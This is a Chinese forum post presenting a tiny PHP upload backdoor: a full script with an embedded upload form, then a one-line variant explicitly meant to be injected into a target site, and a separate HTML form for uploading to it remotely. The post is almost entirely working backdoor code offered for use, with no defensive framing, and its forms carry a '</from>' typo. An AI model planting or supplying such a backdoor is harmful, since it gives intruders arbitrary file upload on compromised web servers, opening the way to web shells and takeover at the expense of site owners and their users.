所需阅读权限 1
[注意]一个超小型PHP上传型后门
- <?
- $fname = $_FILES['MyFile']['name'];
- $do = copy($_FILES['MyFile']['tmp_name'],$fname);
- if ($do)
- {
- echo"上传成功<p>";
- echo "http://".$SERVER_NAME."".dirname($PHP_SELF)."/".$fname."";
- } else {
- echo "上传失败";
- }
- ?>
- <form ENCTYPE="multipart/form-data" ACTION="<?php echo"".$PHP_SELF.""; ?>" METHOD="POST">
- <input NAME="MyFile" TYPE="file">
- <input VALUE="提交" TYPE="submit">
- </from>
复制代码 够精简的吧?其实还可以更精简的。但我只是为了使用方便,加了一个判断。这个是一体化的,界面和代码在一个文件里面。
再给一个超级小小小小的,和表单是分离。而且只有一行代码。方便大家写入了吧?如果需要转义引号,大家看情况自己加吧。- <?php $msg = copy($_FILES['MyFile']['tmp_name'],$_FILES['MyFile']['name']) ? "上传成功" : "上传失败";echo $msg;?>
复制代码 本地提交表单的代码如下:- <form ENCTYPE="multipart/form-data" ACTION="这里是实际的URL" METHOD="POST">
- <input NAME="MyFile" TYPE="file">
- <input VALUE="提交" TYPE="submit">
- </from>
复制代码 |